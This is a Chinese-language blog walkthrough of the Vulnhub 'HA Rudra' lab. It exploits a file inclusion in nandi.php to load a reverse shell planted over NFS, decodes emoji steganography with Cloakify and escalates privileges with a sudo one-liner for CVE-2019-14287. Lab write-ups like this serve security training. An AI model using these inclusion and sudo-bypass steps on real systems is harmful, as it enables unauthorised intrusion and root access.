zoukankan      html  css  js  c++  java
  • HA Rudra: Vulnhub Walkthrough

    最近忙的工(吃)作(屎),没时间写文(摸)章(鱼)!!!

    靶机链接:

    https://www.vulnhub.com/entry/ha-rudra,386/

    IP探测:

    端口扫描:

    2049 NFS 文件系统,尝试本地挂载

    目前看没啥有用的信息,后续尝试提权的时候,或者爆破的时候在看吧

    HTTP 服务目录扫描

    访问:http://10.10.202.130/nandi.php 空白页面

    最后尝试得知有包含漏洞

    通过NFS目录写反弹shell进去,反弹shell出来

    本地监听1234

    浏览器访问:10.10.202.130/nandi.php?file=/home/shivay/shell.php

    即可返回shell

    尝试提权操作:

    find / -perm -u=s -type f 2>/dev/null

    find / -perm -g=s -type f 2>/dev/null

    无可用信息

    查看本地服务,登录MySQL数据库,空密码

    哈哈表情符号

    查看hints 文件提示解密表情符号

    cat hints
    https://www.hackingarticles.in/cloakify-factory-a-data-exfiltration-tool-uses-text-based-steganography/

    without noise

    复制表情符号到本地文本,然后使用该工具进行解密

    ╰─ git clone https://github.com/TryCatchHCF/Cloakify.git

    远程登录

    哈哈这个本地提权的漏洞好熟悉 CVE: 2019-14287

    sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0' -u

    OVER!

  • 相关阅读:
    MySQL Server 5.0安装教程
    c++实现一个小算法
    spring core 与 context理解
    关于eclipse的mysql连接配置
    eclipse中创建一个maven项目
    Oracle中的多表查询(笛卡尔积原理)
    Vue进阶
    计算机网络基础
    java框架之springboot
    bootstrap学习
  • 原文地址:https://www.cnblogs.com/hack404/p/12120439.html
Copyright © 2011-2022 走看看